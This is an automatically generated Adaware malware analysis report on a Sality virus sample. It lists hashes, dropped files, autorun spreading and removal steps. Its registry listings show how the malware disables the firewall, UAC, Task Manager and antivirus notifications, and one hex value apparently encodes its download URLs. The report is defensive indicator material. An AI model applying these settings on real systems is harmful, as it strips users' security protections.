Virus.Win32.Sality_a78e948b94 – Adaware

not-a-virus:AdWare.Win32.SwiftBrowse.o (Kaspersky), Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Worm, Virus, Adware, WormAutorun

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: a78e948b9438fb5d0b463a9109373fed

SHA1: 2ef8856b7b309736cb5ced4a518da3facbd6b990

SHA256: 156fa42bd3c54c5730c66990be5c3c834b801c5bc82186e7771385c207dfb73e

SSDeep: 12288:EvHTO3scLzbKfI1s15Ap/G/8/3D0Fw/tN8dkmLtpHHHrh7OGwZpnZfI:EvHK3scL6j8/z0FmcLbH1OGwvnZg

Size: 659872 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:52:01

Analyzed on: WindowsXP SP3 32-bit

Summary: Virus. A program that recursively replicates a possibly evolved copy of itself.

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.

Process activity

The Virus creates the following process(es):

%original file name%.exe:652
NetCrawl.mg.exe:1964

The Virus injects its code into the following process(es):

Explorer.EXE:532

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:652 makes changes in the file system.

The Virus creates and/or writes to the following file(s):

%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)

The Virus deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (0 bytes)

Registry activity

The process %original file name%.exe:652 makes changes in the system registry.

The Virus creates and/or sets the following values in system registry:

[HKCU\Software\Aas]
"a4_116" = "831618036"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Aas]
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a4_108" = "774265068"
"a4_109" = "781434189"
"a4_102" = "731250342"
"a4_103" = "738419463"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a4_106" = "759926826"
"a4_107" = "767095947"
"a4_104" = "745588584"
"a4_105" = "752757705"
"a2_59" = "422983856"
"a2_58" = "415802315"
"a2_53" = "379969112"
"a2_52" = "372800953"
"a2_51" = "365618500"
"a2_50" = "358449632"
"a2_57" = "408633546"
"a2_56" = "401467511"
"a2_55" = "394299628"
"a2_54" = "387133857"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Aas]
"a4_55" = "394301655"
"a4_54" = "387132534"
"a4_57" = "408639897"
"a4_56" = "401470776"
"a4_51" = "365625171"
"a4_50" = "358456050"
"a4_53" = "379963413"
"a4_52" = "372794292"

[HKCU\Software\Aas\695404737]
"50183847" = "1F9250EF2381E2D9AE4EF061ECA0F3D0A24F2023E89C2CC85BD49E90D6877045BE906EB0B25DD268CB741DC41D5C0FD47CEE5BA9EC3B7870BCA79176776C9A465761F37DEECEAF24ABF58324DE41122D8DABCB3B58798401D9A821FDDE7FC8A4F09BD1E0428648329420F6E9AF57D2FFB6D3C8D7335A31244418C372DFCCE75F"

[HKCU\Software\Aas]
"a4_59" = "422978139"
"a4_58" = "415809018"

[HKCU\Software\Aas\695404737]
"21507363" = "0"

[HKCU\Software\Aas]
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_98" = "685967115"
"a3_99" = "726580138"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Aas]
"a2_99" = "709741282"
"a2_98" = "702576061"
"a2_97" = "695410606"
"a2_96" = "688239508"
"a2_95" = "681059844"
"a2_94" = "673890690"
"a2_93" = "666723460"
"a2_92" = "659566940"
"a2_91" = "652391676"
"a2_90" = "645229003"
"a1_58" = "545363527"
"a1_59" = "205689605"
"a1_56" = "3940586342"
"a1_57" = "2060004643"
"a1_54" = "2506314952"
"a1_55" = "680372722"
"a1_52" = "4207284457"
"a1_53" = "3523504239"
"a1_50" = "2646820777"
"a1_51" = "3330681222"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_43" = "324843106"
"a3_42" = "284237251"
"a3_41" = "277248416"
"a3_40" = "269796609"
"a3_47" = "353765350"
"a3_46" = "313221959"
"a3_45" = "305778468"
"a3_44" = "332278405"
"a3_49" = "368270520"
"a3_48" = "360822809"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Aas]
"a4_99" = "709742979"
"a4_98" = "702573858"
"a2_118" = "845962026"
"a4_91" = "652390011"
"a4_90" = "645220890"
"a4_93" = "666728253"
"a4_92" = "659559132"
"a4_95" = "681066495"
"a4_94" = "673897374"
"a4_97" = "695404737"
"a4_96" = "688235616"
"a3_109" = "798021476"
"a3_108" = "790966981"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallOverride" = "1"

[HKCU\Software\Aas]
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_103" = "754977070"
"a3_102" = "714511503"
"a3_105" = "769475040"
"a3_104" = "762555713"
"a3_107" = "750493346"
"a3_106" = "742980099"
"a2_113" = "810112586"
"a2_112" = "802943978"

"a3_70" = "485103791"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a2_110" = "788595675"
"a2_117" = "838793882"
"a2_116" = "831612138"
"a2_115" = "824446511"
"a2_114" = "817277332"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Aas]
"a1_104" = "3321202338"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas\695404737]
"35845605" = "402"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_115" = "807894458"
"a1_89" = "16034278"
"a1_88" = "66581252"
"a1_85" = "3215076366"
"a1_84" = "796374511"
"a1_87" = "726907533"
"a1_86" = "786512168"
"a1_81" = "139351495"
"a1_80" = "3744106988"
"a1_83" = "3235138390"

"a3_110" = "771902343"
"a3_111" = "778955814"
"a1_67" = "1184186628"
"a1_66" = "3861986246"
"a1_65" = "477675258"
"a1_64" = "2462488458"
"a1_63" = "3938061697"
"a1_62" = "4069992483"
"a1_61" = "1862491724"
"a1_60" = "1304747143"
"a1_69" = "3815860347"
"a1_68" = "827716490"
"a1_12" = "3347564497"
"a1_13" = "522418618"
"a1_10" = "2640225927"
"a1_11" = "2032942692"
"a1_16" = "4114681913"
"a1_17" = "1545574841"
"a1_14" = "3901474534"
"a1_15" = "1014618575"
"a4_115" = "824448915"
"a4_114" = "817279794"
"a1_18" = "3513914988"
"a1_19" = "2871035642"
"a4_111" = "795772431"
"a4_110" = "788603310"
"a4_113" = "810110673"
"a4_112" = "802941552"
"a2_48" = "344127027"
"a2_49" = "351283360"
"a2_40" = "286765755"
"a2_41" = "293942851"
"a2_42" = "301097397"
"a2_43" = "308265093"
"a2_44" = "315446800"
"a2_45" = "322616157"
"a2_46" = "329783293"
"a2_47" = "336949814"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a4_42" = "301103082"
"a4_43" = "308272203"
"a4_40" = "286764840"
"a4_41" = "293933961"
"a4_46" = "329779566"
"a4_47" = "336948687"
"a4_44" = "315441324"
"a4_45" = "322610445"
"a4_48" = "344117808"
"a4_49" = "351286929"
"a3_18" = "112354555"
"a3_19" = "152901914"
"a3_14" = "83367783"
"a3_15" = "124488582"
"a3_16" = "131411001"
"a3_17" = "104906840"
"a3_10" = "88506851"
"a3_11" = "95435266"
"a3_12" = "69459621"
"a3_13" = "76378820"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_39" = "279595719"
"a4_38" = "272426598"
"a1_103" = "4263468156"
"a1_102" = "3287715323"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKCU\Software\Aas]
"a1_101" = "959177234"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Aas]
"a2_88" = "630888512"
"a2_89" = "638057302"
"a2_84" = "602208452"
"a2_85" = "609373204"
"a2_86" = "616539846"
"a2_87" = "623706389"
"a2_80" = "573523784"
"a3_34" = "260325067"
"a2_82" = "587858648"
"a2_83" = "595044364"
"a1_29" = "3756295128"
"a1_28" = "2666588485"
"a1_23" = "1341895885"
"a1_22" = "1201749000"
"a1_21" = "3651443608"
"a1_20" = "3686174937"
"a1_27" = "3229029095"
"a1_26" = "2733721999"
"a1_25" = "2741006536"
"a1_24" = "3944226378"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Aas]
"a3_50" = "341766363"
"a3_51" = "348755322"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_53" = "396796476"
"a3_54" = "370165343"
"a3_55" = "377748222"
"a3_56" = "384737041"
"a3_57" = "425210800"
"a3_58" = "432789459"
"a3_59" = "406145138"
"a2_111" = "795777928"
"a2_31" = "222234366"
"a2_30" = "215079716"
"a2_33" = "236579700"
"a2_32" = "229420813"
"a2_35" = "250914025"
"a2_34" = "243748196"
"a2_37" = "265265678"
"a2_36" = "258096247"
"a2_39" = "279598384"
"a2_38" = "272431193"
"a4_79" = "566360559"
"a4_78" = "559191438"
"a4_73" = "523345833"
"a4_72" = "516176712"
"a4_71" = "509007591"
"a4_70" = "501838470"
"a4_77" = "552022317"
"a4_76" = "544853196"
"a4_75" = "537684075"
"a4_74" = "530514954"
"a4_86" = "616544406"
"a4_87" = "623713527"
"a4_84" = "602206164"
"a4_85" = "609375285"
"a4_82" = "587867922"
"a4_83" = "595037043"
"a4_80" = "573529680"
"a4_81" = "580698801"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools" = "1"

[HKCU\Software\Aas]
"a4_88" = "630882648"
"a4_89" = "638051769"
"a2_100" = "716909694"

[HKCU\Software\Aas\695404737]
"14338242" = "0"
"7169121" = "217"

[HKCU\Software\Aas]
"a2_102" = "731243332"
"a2_103" = "738410538"
"a2_104" = "745596017"
"a2_105" = "752759678"
"a2_106" = "759926299"
"a2_107" = "767093664"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Aas]
"a1_96" = "4114495355"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas]
"a1_107" = "75537886"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Aas]
"a1_106" = "1905142164"
"a1_105" = "2561533072"
"a1_98" = "559672055"
"a1_99" = "1110375132"
"a1_92" = "1109944736"
"a1_93" = "429891561"
"a1_90" = "3232901796"
"a1_91" = "563406027"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_97" = "350953880"
"a1_94" = "3962604742"
"a1_95" = "1304519820"
"a2_75" = "537689669"
"a2_74" = "530520381"
"a2_77" = "552020224"
"a2_76" = "544860422"
"a2_71" = "509014829"
"a2_70" = "501836153"
"a2_73" = "523353220"
"a2_72" = "516173523"
"a1_100" = "431852721"
"a2_79" = "566352092"
"a2_78" = "559189913"
"a1_74" = "1682865374"
"a1_75" = "2629242397"
"a1_76" = "1424397328"
"a1_77" = "63183220"
"a1_70" = "4017115453"
"a1_71" = "87761972"
"a1_72" = "2231819788"
"a1_73" = "2715500761"
"a1_78" = "3874640351"
"a1_79" = "2231058103"
"a1_109" = "901695256"
"a1_108" = "3790730434"
"a1_0" = "3183258191"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKCU\Software\Aas]
"a1_2" = "4080157083"
"a1_3" = "3907000049"
"a1_4" = "270366800"
"a1_5" = "2795759188"
"a1_6" = "2548062973"
"a1_7" = "1369105564"
"a3_29" = "224867540"
"a3_28" = "183865525"
"a1_116" = "2003951785"
"a1_117" = "847050724"
"a1_110" = "3187308900"
"a1_111" = "3361228126"
"a1_112" = "595962318"
"a1_9" = "3159057467"
"a3_21" = "167399900"
"a3_20" = "159956413"
"a3_23" = "148336286"
"a3_22" = "140888703"
"a3_25" = "195929936"
"a3_24" = "188875569"
"a3_27" = "176880658"
"a3_26" = "169827315"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a2_81" = "580704669"
"a3_112" = "785940569"

"a3_113" = "826942712"
"a2_101" = "724089138"
"a1_38" = "1943117499"
"a1_39" = "1441008798"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_30" = "2491654672"
"a1_31" = "3175058885"
"a1_32" = "4252732059"
"a1_33" = "1086018071"
"a1_34" = "126805938"
"a1_35" = "3807567877"
"a1_36" = "982601683"
"a1_37" = "189200723"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Aas]
"a2_108" = "774260148"
"a2_109" = "781425946"
"a3_69" = "478110732"
"a3_68" = "470664173"
"a3_65" = "449123976"
"a3_64" = "442135145"
"a3_67" = "497168202"
"a3_66" = "489720619"
"a3_61" = "454263092"
"a3_60" = "413199509"
"a3_63" = "468244982"
"a3_62" = "461186391"
"a1_1" = "481917349"
"a2_28" = "200730093"
"a2_29" = "207898152"
"a2_26" = "186396554"
"a2_27" = "193562647"
"a2_24" = "172061441"
"a2_25" = "179230362"
"a2_22" = "157727157"
"a2_23" = "164895666"
"a2_20" = "143379376"
"a2_21" = "150542710"
"a4_68" = "487500228"
"a4_69" = "494669349"
"a4_60" = "430147260"
"a4_61" = "437316381"
"a4_62" = "444485502"
"a4_63" = "451654623"
"a4_64" = "458823744"
"a4_65" = "465992865"
"a4_66" = "473161986"
"a4_67" = "480331107"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Aas]
"a2_7" = "50177102"
"a2_6" = "43022743"
"a2_5" = "35842126"
"a2_4" = "28674212"
"a2_3" = "21499892"
"a2_2" = "14341029"
"a2_1" = "7174630"
"a2_0" = "5951"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Aas]
"a2_9" = "64528147"

"a4_5" = "35845605"
"a4_4" = "28676484"
"a4_7" = "50183847"
"a4_6" = "43014726"
"a4_1" = "7169121"
"a4_0" = "0"
"a4_3" = "21507363"
"a4_2" = "14338242"
"a4_9" = "64522089"
"a4_8" = "57352968"
"a3_52" = "389745053"
"a2_8" = "57359054"
"a3_87" = "607024862"
"a3_86" = "633131711"
"a3_85" = "626081308"
"a3_84" = "585598461"
"a3_83" = "578085210"
"a3_82" = "571034939"
"a3_81" = "597665944"
"a3_80" = "590099577"
"a3_89" = "654610320"
"a3_88" = "614067057"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 DF 10 C0 5B AE 62 FE 5E 62 5D 2E C7 01 CD 61"

[HKCU\Software\Aas]
"a1_8" = "1443424694"
"a1_82" = "850347685"
"a2_62" = "444485803"
"a2_63" = "451651996"
"a2_60" = "430152107"
"a2_61" = "437317681"
"a2_66" = "473167898"
"a2_67" = "480334420"
"a2_64" = "458819313"
"a2_65" = "465986252"
"a2_68" = "487503764"
"a2_69" = "494670698"
"a1_41" = "238612446"
"a1_40" = "1419969911"
"a1_43" = "3582830897"
"a1_42" = "323824292"
"a1_45" = "3015243103"
"a1_44" = "2821628314"
"a1_47" = "3861899901"
"a1_46" = "1101151282"
"a1_49" = "2566100455"
"a1_48" = "1730315373"

[HKCU\Software\Aas\695404737]
"43014726" = "0B00687474703A2F2F6572656E6B61726168616E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F677574656B706C2E7A612E706C2F6C6F676F2E67696600687474703A2F2F7777772E6B61707564616E652E636F6D2F6C6F676F2E67696600687474703A2F2F69676F72666F6D696E2E72752F6C6F676F2E67696600687474703A2F2F6D32636F6D756E69636163696F6E2E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6C65656E61656E7465727072697365732E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F7777772E67657269617472696173696E6F702E636F6D2E62722F696D672F627574746F6E2E67696600687474703A2F2F627269746973686D6F746F72732E69742F6C6F676F2E67696600687474703A2F2F617274726F6F6D2E636F6D2E74722F626C6F672F6C6F676F2E67696600687474703A2F2F67616D6D61636F6E7365696C2E66722F696D616765732F627574746F6E2E67696600687474703A2F2F786578796C69612E636F6D2F6C6F676F2E676966"

[HKCU\Software\Aas]
"a3_118" = "862924447"
"a1_114" = "4133660471"
"a1_115" = "2776377689"
"a3_36" = "241268621"
"a3_37" = "248309804"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a3_35" = "267899754"
"a3_32" = "212854281"
"a3_33" = "253401768"
"a3_30" = "231909751"
"a3_31" = "205278614"
"a1_113" = "1283144070"
"a3_38" = "289377359"
"a3_39" = "296296686"

"a1_118" = "2422978816"

"a2_17" = "121866737"
"a2_16" = "114712328"
"a2_15" = "107542081"
"a2_14" = "100362345"
"a2_13" = "93195901"
"a2_12" = "86024915"
"a2_11" = "78869622"
"a2_10" = "71696066"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusOverride" = "1"

[HKCU\Software\Aas]
"a2_19" = "136210088"
"a2_18" = "129045649"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Aas]
"a3_8" = "40388897"
"a3_9" = "47967552"
"a3_6" = "59977839"
"a3_7" = "67032206"
"a3_4" = "11991981"
"a3_5" = "52535244"
"a3_2" = "31040235"
"a3_3" = "4933386"
"a3_0" = "17001001"
"a3_1" = "23989832"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Aas]
"a4_118" = "845956278"
"a4_117" = "838787157"

The Virus modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Firewall notifications are disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = "1"

The Virus modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Task Manager is disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "1"

The Virus modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\c:]
"%original file name%.exe" = "c:\%original file name%.exe:*:Enabled:ipsec"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"AntiVirusDisableNotify" = "1"

The Virus deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NetCrawl.mg.exe:1964 makes changes in the system registry.

The Virus creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B EE FD F8 71 86 00 99 F2 FB 6D F8 2E 65 BA 8A"

Dropped PE files

MD5	File path
9b22fa552e37770118146e753a34d03f	c:\xfdei.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Virus's file once a user opens a drive's folder in Windows Explorer.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:652
NetCrawl.mg.exe:1964
Delete the original Virus file.
Delete or disinfect the following files created/modified by the Virus:
%WinDir%\system.ini (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\WmiInspector.dll (3039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\NSISEncrypt.dll (3277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\NetCrawl.mg.exe (8400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\mj (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\lm (128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\IpConfig.dll (4136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000CB2AB_Rar\%original file name%.exe (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ilg (259958 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\ns4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\NetCrawl\tlg (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk2.tmp\nsJSON.dll (7 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
